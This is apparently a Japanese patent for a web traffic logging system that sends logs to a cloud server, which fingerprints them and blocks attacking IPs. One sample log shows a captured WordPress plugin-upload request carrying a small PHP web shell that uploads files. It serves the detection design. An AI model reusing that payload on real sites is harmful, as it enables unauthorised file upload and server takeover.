type=PATH msg=audit(1496192294.704:6684): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=70629119 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL
その時、一般的なリナックス(登録商標)オペレーティングシステムで生成する基本ログとは異なり、ウェブトラフィックロギング部110で生成するログは、プログラム動作位置(/var/www/html/wordpress)、プログラム実行情報(ps aux, ls)、プログラム全体経路(/usr/bin/ps, /usr/bin/ls)及びプログラム情報(pid, ppid, uid, gid, euid, egid)のようなウェブシェル攻撃の検知に対する重要情報を含んでもよい。
また、ウェブサーバ100のウェブトラフィックロギング部110は、ウェブのHTTP/HTTPSプロトコルのメソッドの中に、ポスト方式のポストボディデータを含むように下記のようなログで生成してもよい。
{"Cookie":"",
"Status":"200",
"Accept-Charset":"",
"Post-body":"--dd2dbcbca6e24139920596392a2bd70ernContent-Disposition: form-data; name=&quot;action&quot;rnrnshowbiz_ajax_actionrn--dd2dbcbca6e24139920596392a2bd70ernContent-Disposition: form-data; name=&quot;client_action&quot;rnrnupdate_pluginrn--dd2dbcbca6e24139920596392a2bd70ernContent-Disposition: form-data; name=&quot;update_file&quot;; filename=&quot;NULLpOint7r__fiydj.php&quot;rnContent-Type: text/htmlrnrn&lt;?php @set_time_limit(0);@header(&#39;null77: pOinter&#39;);?&gt;&lt;form method=&#39;POST&#39; enctype=&#39;multipart/form-data&#39;&gt;&lt;input type=&#39;file&#39; name=&#39;f&#39;/&gt;&lt;input type=&#39;submit&#39; value=&#39;up&#39;/&gt;&lt;/form&gt;&lt;?php echo @copy($_FILES[&#39;f&#39;][&#39;tmp_name&#39;],$_FILES[&#39;f&#39;][&#39;name&#39;])?&#39;ok&#39;:&#39;no&#39;;?&gt;rn--dd2dbcbca6e24139920596392a2bd70e--",
"Accept":"*/*",
"Server":"Apache",
"Request":"POST /wp-admin/admin-ajax.php HTTP/1.1",
"Referer":"",
"User-Agent":"Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0",
"Connection":"keep-alive",
"Host":"nresearch.net",
"From":"",
"Accept-Encoding":"gzip, deflate",
"Method":"POST",
"x-forwarded-for":"",
"Remote-addr":"123.456.789.123",
"Uri":"/wp-admin/admin-ajax.php",
"Authorization":"",
"Cache-Control":"",
"Accept-Language":"",
"Content-Length":"652",
"Request-date":"Sat Sep 23 05:25:25 2017",
"Content-Type":""}
また、ウェブサーバ100のウェブトラフィックロギング部110は、ウェブのHTTP/HTTPSプロトコルのメソッドのうち、レスポンスボディに含むように下記のようなログで生成してもよい。
{"Uri":"/daytime",
"Host":"10.100.10.86:8080",
"Connection":"keep-alive",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding":"gzip, deflate","Accept-Language":"ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7","Remote-addr":"10.100.10.170",
"Request":"GET /daytime HTTP/1.1",
"Method":"GET",
"Content-Type":"text/html;charset=ISO-8859-1",
"Content-Length":"160",
"Respbody":"<html>\n<head>\n<title>DayTime</title>\n</head>\n<body>\n<div style=\"font-size: 40px; text-align: center; font-weight: bold\">\n2018/3/17 14:41\n</div>\n</body>\n</html>\n",
"Status":"200",
"Server":"Apache/2.4.2",
"Request-date":"Sat March 17 14:39:49 2018"}
ログ統合部114は、ログ設定に応じて生成されるログを統合し、ログ情報を生成する。ログ統合部114は、ログ情報をログ転送部116に転送する。
ログ統合部114は、ログ設定部112の設定に応じて、機密データは、アスタリスク(asterisk; *)のような特殊文字に変換するか、或いは暗号化し、ログ設定部112の設定に応じて、機密データ推奨システムで機密データを選別し、別途ファイルに記録してもよい。
ログ統合部114は、ログ設定部112のプロトコル設定に応じて、HTTP(80)である場合は、一般の平文分析を支援し、HTTPS(443)である場合は、ウェブサーバの証明書及びプライベートキーを用いて暗号文を平文に変換してログを保存してもよい。
ログ転送部116は、ログ情報をあらかじめ指定された形式にエンコードしてクラウドサーバ200に転送する。従って、ログ転送部116は、エンコードを介してログ情報を圧縮してクラウドサーバ200に転送するため、ネットワークトラフィックを低減できる。又は具現方法により、ログ転送部116は、ログ情報を非圧縮状態でウェブトラフィックロギング部110の資源消費を低減する形態に具現されてもよい。その時、ログ転送部116は、複数のクラウドサーバ200に各ログ情報を分散して転送してもよい。従って、複数クラウドサーバ200は、並列的なログ分析による攻撃検知を行ってもよい。
また、ログ転送部116は、ログ統合部で統合されたログを転送する場合、転送量を減らすために、プログラム実行を行わない静的ファイルに対しては転送から除外処理できるように選択事項を提供し、圧縮及び非圧縮、暗号化及び非暗号化に対しても選択事項を提供してもよい。ログ転送部116は、例えば、リクエストメソッドの中でGETである場合は、静的ファイルであって単なるファイル、画像、フォントなどであり、プログラム実行が行なわれない静的ファイルに対しては、生成されたログから分析システムであるクラウドサーバに転送しなくてもよい。
IPアドレス遮断部118は、クラウドサーバ200からウェブハッキング検知情報を受信するか、或いは自動且つ周期的に接続し、該当の情報を読み込む方法で情報を取得し、検知情報に含まれたソースIP(Source IP)アドレスからのアクセスを遮断する。例えば、IPアドレス遮断部118は、ウェブハッキング検知情報のソースIPアドレスを遮断リストに追加し、遮断リストに含まれた各ソースIPアドレスに対応するアクセスを遮断してもよい。IPアドレス遮断部118は、ウェブトラフィックロギング部110がウェブサーバ100に含まれておらず、リバースプロキシサーバ又は別途のサーバから構成される場合は、ウェブサーバ100にウェブハッキング検知情報に含まれたソースIP(Source IP)アドレス情報を転送し、ウェブサーバ100でウェブハッキング検知情報のソースIPアドレスを遮断リストに追加し、或いは、オペレーティングシステムに含まれたファイアウォール又はIPテーブル(iptables)などに遮断リストを追加し、遮断リストに含まれた各ソースIPアドレスに対応するアクセスを遮断してもよい。
図3は、本発明の一実施形態によるウェブトラフィックロギングシステムのクラウドサーバを説明するための図である。
図3を参照すると、本発明の一実施形態によるクラウドサーバ200は、ログ分解部210、フィンガープリント生成部220、及び検知部230を含む。
ログ分解部210は、ウェブサーバ100のウェブトラフィックロギング部110から受信したログ情報をフィールド別に分解する。例えば、ログ分解部210は、ログ情報をHeader、Request Body(Post-Body)、Response Body(Resp-Body)、Cookieなどのあらかじめ設定されたフィールド単位に分解する。ログ分解部210は、分解されたログ情報(以下、「フィールド情報」とする)をフィンガープリント生成部220に転送する。また、ログ分解部210は、ログ情報を検知部230に転送する。
フィンガープリント生成部220は、フィールド情報別にフィンガープリントを生成する。その時、フィンガープリントは、SQL、HTML、Java(登録商標)、ウェブシェルなどのフィールド情報の形式に応じて構文解析(parsing)を行い、指定された単語、数字及び文字をあらかじめ指定された文字(以下、「変換文字」とする)に変換した文字列である。例えば、フィンガープリント生成部220は、フィールド情報に特定単語が含まれている場合、該単語を該単語に対応してあらかじめ指定された変換文字に変換してもよい。また、フィンガープリント生成部220は、フィールド情報に数字列が含まれている場合、該数字列をすべての数字に対応してあらかじめ設定された変換文字に変換してもよい。フィンガープリント生成部220は、各単語、数字、文字に対応する変換文字を順次に含むフィンガープリントを生成してもよい。その時、各単語、数字及び文字に対応してあらかじめ指定された変換文字は、フィールド情報の形式(SQL、HTML、Java(登録商標)script、ウェブシェルなど)ごとに異なるように指定されてもよい。例えば、SQL形式のフィールド情報及びHTML形式のフィールド情報に含まれた同じ単語に対して、あらかじめ異なる変換文字が指定されてもよい。フィンガープリント生成部220は、各フィールド情報に対するフィンガープリントを検知部230に転送する。すなわち、フィンガープリント生成部220は、SQLキーワード及びSQLインジェクションに用いられる文字を除くすべての単語及び数字を特定文字で表現し、キーワードやインジェクション文に用いられる単語/文字も指定した文字で表現したSQLフィンガープリントを生成してもよい。また、フィンガープリント生成部220は、HTMLに用いられる文字を除くすべての単語及び数字を特定文字で表現し、キーワードに用いられる単語/文字も指定した文字で表現したHTMLフィンガープリントを生成してもよい。また、フィンガープリント生成部220は、Java(登録商標)scriptに用いられる文字を除くすべての単語及び数字を特定文字で表現し、キーワードに用いられる単語/文字も指定した文字で表現するJava(登録商標)scriptフィンガープリントを生成してもよい。また、フィンガープリント生成部220は、php、asp、perl、python、bashなどのようなプログラムに用いられる文字を除くすべての単語及び数字を特定文字で表現し、キーワードに用いられる単語/文字も指定した文字で表現したウェブシェル(web shell)をフィンガープリントで生成してもよい。
検知部230は、各フィンガープリントのうち、攻撃に対応するフィンガープリント(以下、「攻撃フィンガープリント」とする)が存在するかを判断する。検知部230は、すべてのハッキング攻撃に対するフィンガープリントを含むブラックリストを保存し、各フィンガープリントのうち、ブラックリスト内に含まれたフィンガープリントが存在する場合、該ブラックリストと対応するフィンガープリントを攻撃フィンガープリントであると判断する。
検知部230は、各フィンガープリントのうち、攻撃フィンガープリントが存在しない場合、ログ分解部210からログ情報を受信し、ログ情報に対する署名ベースの攻撃検知を行う。その時、検知部230は、あらかじめ指定された攻撃に対する署名を保存し、保存された署名と対応する署名がログ情報に存在する場合、該ログ情報による攻撃が発生したものと判断してもよい。
検知部230は、攻撃フィンガープリントが存在するか、或いは署名ベースの攻撃検知によって攻撃が検出された場合、分析対象であるログ情報のソースIP(source IP)アドレスを含む検知情報を生成してこれを保存し、ウェブトラフィックロギング部110のIPアドレス遮断部118が周期的に読み込むようにするか、或いはウェブトラフィックロギング部110のIPアドレス遮断部118に転送する。
図4は、本発明の一実施形態によるウェブハッキングのリアルタイム検知のためのウェブトラフィックロギング方法を説明するための図である。
図4を参照すると、ステップS410において、ウェブサーバ100のウェブトラフィックロギング部110は、ログ設定を行う。
ウェブトラフィックロギング部110は、ウェブサーバハッキングに備えるためにウェブクライアントとウェブサーバとの間のHTTP/HTTPSプロトコル内のすべての項目においてハッキングを検知する。
ウェブトラフィックロギング部110は、HTTP/HTTPSプロトコルメソッド、例えば、ポストボディ、レスポンスボディに転送されるデータをログとして収集し、プログラム動作位置、プログラム実行情報、プログラム実行対象形態及びプログラム実行主体、プログラム全体経路及びプログラム情報のうちの一つ以上を含むログを収集するようにログ設定を行ってもよい。これは、ハッカーがポスト(POST)方式で本文(BODY)に攻撃データを挿入して攻撃するためであり、ポストボディの分析は重要である。また、攻撃の成功有無に対してレスポンスボディを通じて明確に判別できるので、レスポンスボディの分析も重要である。例えば、SQLインジェクション攻撃において、実際のデータ漏洩が生じたのかを直接確認することができ、被害度や危険度の測定が可能である。また、別の例として、クロスサイトスクリプティング(XSS)攻撃の場合、GET/POSTのリクエストステップで検知し、レスポンスステップであるレスポンスボディをクラウドサーバの仮想ウェブ環境上で行って検知する方法で、さらに明確に検知できるように駆動してもよい。ここで、仮想ウェブ環境とは、ユーザパソコンのブラウザで実行するのと類似の環境であり、ブラウザエミュレータなどの様々な技術がある。
ステップS420において、ウェブトラフィックロギング部110は、オペレーティングシステムによって生成されたログを統合してログ情報を生成する。
ステップS430において、ウェブトラフィックロギング部110は、ログ情報をクラウドサーバ200に転送する。その時、ウェブトラフィックロギング部110は、ログ情報をあらかじめ指定された方法に応じてエンコードし、ログ情報を転送する際のネットワーク負荷を低減でき、またデータを暗号化して保護することもできる。
ステップS440において、クラウドサーバ200は、ログ情報をフィールド別に分解する。例えば、クラウドサーバ200は、ログ情報をHeader、Request Body、Response Body、URL、Cookieなどのあらかじめ設定されたフィールド単位に分解してもよい。
ステップS450において、クラウドサーバ200は、フィールド別にフィンガープリントを生成する。例えば、クラウドサーバ200は、フィールド情報の形式に応じて構文解析を行い、指定された単語、数字及び文字をあらかじめ指定された変換文字に変換し、フィンガープリントを生成してもよい。
ステップS460において、クラウドサーバ200は、全体フィンガープリントのうち、ブラックリストに含まれたフィンガープリントと対応する攻撃フィンガープリントが存在するかを判断する。
ステップS470において、攻撃フィンガープリントが存在しない場合、クラウドサーバ200は、ログ情報に対して署名ベースの攻撃検知方法を適用して攻撃を検知する。
ステップS480において、クラウドサーバ200は、フィンガープリントベース又は署名ベースの攻撃検知方法によって攻撃が検知された場合、ログ情報に対応するソースIPアドレスを含む検知情報をウェブトラフィックロギング部110に転送する。
ステップS490において、ウェブサーバ100又はウェブトラフィックロギング部110は、検知情報のソースIPアドレスからのアクセスを遮断する。例えば、ウェブサーバ100又はウェブトラフィックロギング部110は、検知情報のソースIPアドレスを遮断リストに追加し、遮断リストに含まれた各ソースIPアドレスに対応するアクセスを遮断してもよい。
図5は、本発明の第2の実施形態によるウェブトラフィックロギングシステムを説明するための図である。
図5を参照すると、本発明の第2の実施形態によると、ウェブトラフィックロギング部110は、ウェブサーバ100のプログラムとは独立し、クライアントとウェブサーバとの間の通信で発生するHTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集するモジュールから構成されてもよい。ウェブトラフィックロギング部110は、ウェブサーバ100のプログラムとは独立したモジュールから構成され、すべての項目において、特にポストボディ及びレスポンスボディのログを生成し、生成されたポストボディ及びレスポンスボディのログをクラウドサーバ200に転送してもよい。これは、多くの市販のウェブサーバプログラムの場合、ウェブサーバプログラムのメモリー共有を支援しないか、或いはシステムの性能上などの理由から、市販のウェブサーバプログラムに組み込まれるモジュールをインストールできない場合があるためである。
図6は、本発明の第3の実施形態によるウェブトラフィックロギングシステムを説明するための図である。
図6を参照すると、本発明の第3の実施形態によると、ウェブトラフィックロギング部110は、リバースプロキシ機能を活用するリバースプロキシサーバ300から構成されてもよい。リバースプロキシサーバ300は、ウェブログ分析のためのモジュールをインストールするか、或いはポストボディのロギング機能を活性化し、HTTP/HTTPSプロトコルのリクエスト及びレスポンスのすべての項目において、特にポストボディ及びレスポンスボディのログを生成し、生成されたポストボディ及びレスポンスボディのログをリアルタイムでクラウドサーバ200に転送してもよい。ここで、リバースプロキシ(Reverse Proxy)機能とは、クライアントのリクエストに対してウェブサーバにトラフィックを転送する過程で中間に位置し、クライアントのリクエストを先に受け、これを再びウェブサーバ100にトラフィックを転送する方法であり、サーバの応答方法においても、これを先に受け、それからクライアントに転送するものである。ウェブトラフィックロギング部110は、リバースプロキシサーバ300によって具現されるので、ウェブサーバプログラムに直接モジュールのインストールを行うことなく、ハッキング検知のための重要ログであるポストボディ及びレスポンスボディなどを生成してもよい。ウェブトラフィックロギング部110は、リバースプロキシサーバ300によって具現される場合、クライアントネットワークの構成に変化をもたらすことがあるが、ウェブサーバにモジュールがインストールされないといった長所がある。
図7は、本発明の第4の実施形態によるウェブトラフィックロギングシステムを説明するための図である。
図7を参照すると、本発明の第4の実施形態によると、ウェブトラフィックロギング部110は、ポートミラーリング(Port mirroring)技法を用いてクライアントとウェブサーバとの間のトラフィックを、リバースプロキシのように中間に位置するのではなく、別途のウェブトラフィックロギングサーバ400においてHTTP/HTTPSプロトコルをログとして保存するようにし、ハッキング検知を支援してもよい。これは、システムの運営上、リバースプロキシは新たなシステムであることから、運営中のシステムに変更が必要となるためであり、システムに加えられるので障害発生点が増えることから、メンテナンス費用が増大するためである。
ウェブトラフィックロギングサーバ400は、ポートミラーリング機能を活用して別途のサーバでウェブのトラフィックを受信する。受信されるHTTP/HTTPSプロトコルのリクエスト及びレスポンスのすべての項首において、特にポストボディ、レスポンスボディなどをログとして生成するか、或いは遠隔地クラウドサーバに転送する。ここで、ポートミラーリング(Port Mirroring)機能とは、ネットワークスイッチの任意の一つのポートのすべてのネットワークパケット又は全体VLANのすべてのパケットを他のモニタリングポートに複製するために用いられる技術である。仮にスイッチのポートミラーリング機能がない場合、ネットワークタップ(TAP; Test Access Ports)装備を用いてHTTP/HTTPSプロトコルのすべての項目、特にポストボディ及びレスポンスボディをログとして生成するか、或いは遠隔地サーバに転送する。ここで、タップ(TAP)装備とは、データ流れの中断なく、ネットワークに何ら影響を与えることなくトラフィックをモニタリングできるようにしてくれる装備である。ウェブトラフィックロギングサーバ400は、ウェブサーバプログラムに直接モジュールのインストールを行うことなく、ハッキング検知のために重要なログであるポストボディ、レスポンスボディなどを生成してもよい。
またポートミラーリング技法を活用すると、ハッカーがウェブサーバのハッキング後にログを直接操作して分析を妨害する攻撃を遮断することができる。
前述した本発明の実施形態は、様々な手段によって具現されてもよい。例えば、本発明の実施形態は、ネットワークスイッチ、ファイアウォール、タップ、L4スイッチ、リバースプロキシハードウェア装備、ソフトウェアプログラム又はそれらの組合せなどによって具現されてもよい。
また、本発明の実施形態は、ハードウェア、ファームウェア(firmware)、ソフトウェア又はそれらの組合せなどによって具現されてもよい。
ハードウェアによる具現の場合、本発明の実施形態による方法は、一つ又はそれ以上のASICs(Application Specific Integrated Circuits)、DSPs(Digital Signal Processors)、DSPDs(Digital Signal Processing Devices)、PLDs(Programmable Logic Devices)、FPGAs(Field Programmable Gate Arrays)、プロセッサ、コントローラ、マイクロコントローラ、マイクロプロセッサなどによって具現されてもよい。
ファームウェアやソフトウェアによる具現の場合、本発明の実施形態による方法は、以上で説明された機能又は動作を遂行するモジュール、プロセス又は関数などの形態で具現されてもよい。ソフトウェアコードなどが記録されたコンピュータプログラムは、コンピュータ可読記録媒体又はメモリーユニットに保存され、プロセッサによって駆動されてもよい。メモリーユニットは、プロセッサの内部又は外部に位置し、既に公知となった様々な手段によってプロセッサとデータのやり取りをすることができる。
また、本発明に添付されたブロック図の各ブロック及び流れ図の各ステップの組合せは、コンピュータプログラム命令(instruction)によって遂行されてもよい。これらコンピュータプログラム命令は、汎用のコンピュータ、特殊用のコンピュータ又はその他のプログラム可能なデータプロセシング装備のエンコードプロセッサに搭載できるので、コンピュータ又はその他のプログラム可能なデータプロセッシング装備のエンコードプロセッサによって行われるその命令が、ブロック図の各ブロック又は流れ図の各ステップで説明された機能を遂行する手段を生成するようになる。これらコンピュータプログラム命令は、特定の方法で機能を具現するために、コンピュータ又はその他のプログラム可能なデータプロセッシング装備を志向できるコンピュータ利用可能又はコンピュータ可読メモリーに保存されることもできるので、そのコンピュータ利用可能又はコンピュータ可読メモリーに保存された命令は、ブロック図の各ブロック又は流れ図の各ステップで説明された機能を遂行する命令手段を内包する製造品目を生産することもできる。コンピュータプログラム命令は、コンピュータ又はその他のプログラム可能なデータプロセッシング装備上に搭載されることも可能なので、コンピュータ又はその他のプログラム可能なデータプロセッシング装備上で一連の動作ステップが行われてコンピュータで実行されるプロセスを生成し、コンピュータ又はその他のプログラム可能なデータプロセッシング装備を遂行する命令は、ブロック図の各ブロック及び流れ図の各ステップで説明された機能を行うためのステップを提供することも可能である。
加えて、各ブロック又は各ステップは、特定の論理的機能を行うための一つ以上の実行可能な命令を含むモジュール、セグメント又はコードの一部を示してもよい。また、いくつかの代替可能な実施形態では、ブロック又はステップにおいて述べた機能が手順から脱して発生することもできる点に注目すべきである。例えば、連続して図示されている二つのブロック又はステップは、実は実質的に同時に行われてもよく、或いはそのブロック又はステップが、時には該当する機能に応じて逆順で行われてもよい。
このように、この発明の属する技術の分野における当業者は、本発明がその技術的思想や必須の特徴を変更することなく、他の具体的な形態で実施され得ることを理解できるはずである。従って、前述の実施形態は、すべての面において例示のものに過ぎず、限定するためのものではないと理解されるべきである。本発明の範囲は、発明の詳細な説明よりは添付の特許請求の範囲によって示され、特許請求の範囲の意味及び範囲、並びにその等価概念から想到されるすべての変更又は変形された形態も、本発明の範囲に含まれるものと解釈されるべきである。

Claims (19)

  1. ウェブトラフィックロギングシステムにおいて、
    ウェブサーバ及びウェブサーバのオペレーティングシステムのうちの少なくとも一つからログを収集するための設定を行うログ設定部と、
    前記設定に応じて収集された前記ログを含むログ情報を生成するログ統合部と、
    前記ログ情報をクラウドサーバに転送するログ転送部と、を含む、ウェブトラフィックロギングシステム。
  2. 前記クラウドサーバが、前記ログ情報をフィールド別に分解するログ分解部と、
    フィールド別にフィンガープリントを生成するフィンガープリント生成部と、
    前記フィンガープリントのうち、ブラックリストに含まれたフィンガープリントに対応する攻撃フィンガープリントが存在する場合、ソースIPアドレスを含む検知情報を生成する検知部と、を含む、請求項1に記載のウェブトラフィックロギングシステム。
  3. 前記フィンガープリントは、前記ログ情報に含まれた単語及び前記単語が含まれたフィールドに対応してあらかじめ指定された変換文字に前記単語を変換し、前記ログ情報に含まれた数字列をすべての数字に対応してあらかじめ指定された変換文字に変換することを特徴とする、請求項2に記載のウェブトラフィックロギングシステム。
  4. 前記検知部が、前記フィンガープリントのうち、ブラックリストに含まれたフィンガープリントに対応する攻撃フィンガープリントが存在しない場合、署名ベースの攻撃検知方法によって前記ログ情報に対応する攻撃を検知することを特徴とする、請求項2に記載のウェブトラフィックロギングシステム。
  5. 前記ログ設定部が、ポストボディ、レスポンスボディに転送されるデータを含むログを収集し、プログラム動作位置、プログラム実行情報、プログラム実行対象形態及びプログラム実行主体、プログラム全体経路及びプログラム情報のうちの一つ以上を含むログを収集する設定を行う、請求項1に記載のウェブトラフィックロギングシステム。
  6. 前記ウェブトラフィックロギングシステムは、ウェブサーバプログラムに組み込まれ、ウェブサーバ及びウェブサーバのオペレーティングシステムのうちの少なくとも一つで発生するログ生成のためのログ設定を行い、ログ設定に応じてログを生成及び統合し、生成したログ情報をクラウドサーバに転送する、請求項1に記載のウェブトラフィックロギングシステム。
  7. 前記ウェブトラフィックロギングシステムは、ウェブサーバプログラムとは独立して、クライアントとウェブサーバとの間の通信で発生するHTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集するモジュールから構成されて生成されたポストボディ、レスポンスボディのログ情報を前記クラウドサーバに転送する、請求項1に記載のウェブトラフィックロギングシステム。
  8. 前記ウェブトラフィックロギングシステムは、クライアントのリクエストに対してウェブサーバにトラフィックを転送する過程で中間に位置し、クライアントのリクエストを先に受け、これを再びウェブサーバにトラフィックを転送するリバースプロキシサーバから構成され、クライアントとウェブサーバとの間の通信で発生するHTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集して生成されたポストボディ、レスポンスボディのログ情報を前記クラウドサーバに転送する、請求項1に記載のウェブトラフィックロギングシステム。
  9. 前記ウェブトラフィックロギングシステムは、ポートミラーリング技法を用いてクライアントとウェブサーバとの間のトラフィックを別途のウェブトラフィックロギングサーバで統合し、HTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集して生成されたポストボディ、レスポンスボディのログ情報を前記クラウドサーバに転送する、請求項1に記載のウェブトラフィックロギングシステム。
  10. 前記ログ設定部が、セキュリティ原則に応じてあらかじめ設定された機密データは、アスタリスク(asterisk; *)のような特殊文字に変換するか、或いは暗号化するための設定を提供し、
    前記機密データを事前に監視し、前記機密データが平文で保存されるのを防ぐための、機密データを事前に検知して推奨する設定を提供する、請求項1に記載のウェブトラフィックロギングシステム。
  11. 前記ログ統合部が、前記ログ設定部の設定に応じて、機密データは、アスタリスク(asterisk; *)のような特殊文字に変換するか、或いは暗号化し、
    ログ設定部の設定に応じて、機密データ推奨システムで機密データを選別して別途ファイルに記録する、請求項10に記載のウェブトラフィックロギングシステム。
  12. 前記ログ統合部が、ログ設定部のプロトコル設定に応じて、HTTP(80)である場合は、一般の平文分析を支援し、HTTPS(443)である場合は、ウェブサーバの証明書及びプライベートキー(秘密鍵)を用いて暗号文を平文に変換してログを保存する、請求項1に記載のウェブトラフィックロギングシステム。
  13. 前記ログ転送部が、前記ログ統合部で統合されたログを転送する場合、転送量を減らすために、プログラム実行を行わない静的ファイルに対しては転送から除外処理できるように選択事項を提供し、圧縮及び非圧縮、暗号化及び非暗号化に対しても選択事項を提供する、請求項1に記載のウェブトラフィックロギングシステム。
  14. ウェブトラフィックロギングシステムにおける、ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギング方法において、
    ログを収集するための設定を行うステップと、
    前記設定に応じて収集された前記ログを含むログ情報を生成するステップと、
    前記ログ情報をクラウドサーバに転送するステップと、を含む、ウェブトラフィックロギング方法。
  15. 前記ログを収集するための設定を行うステップが、ポストボディ、レスポンスボディに転送されるデータを含むログを収集し、プログラム動作位置、プログラム実行情報、プログラム実行対象形態及びプログラム実行主体、プログラム全体経路及びプログラム情報のうちの一つ以上を含むログを収集する設定を行う、請求項14に記載のウェブトラフィックロギング方法。
  16. 前記クラウドサーバが、前記ログ情報をフィールド別に分解するステップと、
    前記クラウドサーバが、前記ログ情報に対応するフィンガープリントを生成するステップと、
    前記クラウドサーバが、前記フィンガープリントのうち、ブラックリストに含まれたフィンガープリントに対応する攻撃フィンガープリントが存在する場合、ソースIPアドレスを含む検知情報を生成するステップと、
    前記検知情報に応じて、前記ログ情報のソースIPアドレスからのアクセスを遮断するステップと、をさらに含む、請求項14に記載のウェブトラフィックロギング方法。
  17. 前記フィンガープリントは、前記ログ情報に含まれた単語及び前記単語が含まれたフィールドに対応してあらかじめ指定された変換文字に前記単語を変換し、前記ログ情報に含まれた数字列をすべての数字に対応してあらかじめ指定された変換文字に変換した情報である、請求項16に記載のウェブトラフィックロギング方法。
  18. 前記フィンガープリントのうち、ブラックリストに含まれたフィンガープリントに対応する攻撃フィンガープリントが存在しない場合、署名ベースの攻撃検知方法によって前記ログ情報に対応する攻撃を検知するステップをさらに含む、請求項16に記載のウェブトラフィックロギング方法。
  19. 前記ウェブトラフィックロギングシステムは、ウェブサーバプログラムとは独立して、クライアントとウェブサーバとの間の通信で発生するHTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集するモジュールで含むか、
    クライアントのリクエストに対してウェブサーバにトラフィックを転送する過程で中間に位置し、クライアントのリクエストを先に受け、これを再びウェブサーバにトラフィックを転送するリバースプロキシサーバを含むか、或いは
    ポートミラーリング技法を用いてクライアントとウェブサーバとの間のトラフィックを別途のウェブトラフィックロギングサーバを含み、HTTP/HTTPSプロトコルのリクエスト及びレスポンスを収集してポストボディ、レスポンスボディのログを生成する、請求項14に記載のウェブトラフィックロギング方法。
JP2018549535A 2017-09-28 2018-09-07 ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギングシステム及び方法 Withdrawn JP2019533841A (ja)

Applications Claiming Priority (5)

Application Number Priority Date Filing Date Title
KR1020170126521A KR101896267B1 (ko) 2017-09-28 2017-09-28 실시간 로그 분석 기반의 공격 탐지 시스템 및 방법
KR10-2017-0126521 2017-09-28
KR1020180038520A KR101909957B1 (ko) 2018-04-03 2018-04-03 실시간 웹 해킹 탐지를 위한 웹 트래픽 로깅 시스템 및 방법
KR10-2018-0038520 2018-04-03
PCT/KR2018/010450 WO2019066295A1 (ko) 2017-09-28 2018-09-07 실시간 웹 해킹 탐지를 위한 웹 트래픽 로깅 시스템 및 방법

Publications (1)

Publication Number Publication Date
JP2019533841A true JP2019533841A (ja) 2019-11-21

Family

ID=65901579

Family Applications (1)

Application Number Title Priority Date Filing Date
JP2018549535A Withdrawn JP2019533841A (ja) 2017-09-28 2018-09-07 ウェブハッキングのリアルタイム検知のためのウェブトラフィックロギングシステム及び方法

Country Status (5)

Country Link
US (1) US11140181B2 (ja)
EP (1) EP3691217B1 (ja)
JP (1) JP2019533841A (ja)
CN (1) CN109845228B (ja)
WO (1) WO2019066295A1 (ja)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
WO2022219806A1 (ja) * 2021-04-16 2022-10-20 日本電信電話株式会社 判定装置、判定方法、および、判定プログラム

Families Citing this family (13)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
SG11202100631VA (en) * 2018-09-14 2021-02-25 Toshiba Kk Communication control device
CN110430159B (zh) * 2019-06-20 2022-01-11 国网辽宁省电力有限公司信息通信分公司 一种平台服务器防火墙策略开放范围过大预警方法
US11770377B1 (en) * 2020-06-29 2023-09-26 Cyral Inc. Non-in line data monitoring and security services
CN112118089B (zh) * 2020-09-18 2021-04-30 广州锦行网络科技有限公司 一种webshell监控方法及系统
CN112565269B (zh) * 2020-12-07 2023-09-05 深信服科技股份有限公司 服务器后门流量检测方法、装置、电子设备及存储介质
US11863526B2 (en) * 2021-02-12 2024-01-02 Paypal, Inc. Dynamically routing network traffic between defense layers
CN114338169B (zh) * 2021-12-29 2023-11-14 北京天融信网络安全技术有限公司 请求处理方法、装置、服务器及计算机可读存储介质
CN114389809B (zh) * 2022-02-18 2024-05-03 山西清网信息技术有限公司 一种加密https协议的信息化网络安全防护方法
CN115941555B (zh) * 2022-05-09 2024-05-28 国家计算机网络与信息安全管理中心 一种基于流量指纹的app个人信息收集行为检测方法及系统
CN114884844B (zh) * 2022-06-14 2023-12-26 上海幻电信息科技有限公司 流量录制方法及系统
CN115361444A (zh) * 2022-08-18 2022-11-18 中国工商银行股份有限公司 流量数据分析方法、装置及系统
CN116248413B (zh) * 2023-05-09 2023-07-28 山东云天安全技术有限公司 一种webshell文件的流量检测方法、设备及介质
CN118157989A (zh) * 2024-05-08 2024-06-07 安徽华云安科技有限公司 Webshell内存马检测方法、装置、设备以及存储介质

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
JP2006304108A (ja) * 2005-04-22 2006-11-02 Ntt Communications Kk ログ集計支援装置、ログ集計支援システム、ログ集計支援プログラム、およびログ集計支援方法
JP2008117267A (ja) * 2006-11-07 2008-05-22 Yafoo Japan Corp 閲覧履歴提供システム、閲覧履歴提供装置、閲覧履歴提供方法、および閲覧履歴提供プログラム
JP2013137740A (ja) * 2011-11-28 2013-07-11 Internatl Business Mach Corp <Ibm> 機密情報識別方法、情報処理装置、およびプログラム
US20140344622A1 (en) * 2013-05-20 2014-11-20 Vmware, Inc. Scalable Log Analytics
US20150281007A1 (en) * 2014-03-28 2015-10-01 Fortinet, Inc. Network flow analysis
JP2016114985A (ja) * 2014-12-11 2016-06-23 Tis株式会社 ログ解析方法、ログ解析プログラム及びログ解析装置
JP2017097858A (ja) * 2015-11-20 2017-06-01 インターナショナル・ビジネス・マシーンズ・コーポレーションInternational Business Machines Corporation クラウド環境における保証されたログ管理のためのアプリケーション・セルフサービス

Family Cites Families (9)

* Cited by examiner, † Cited by third party
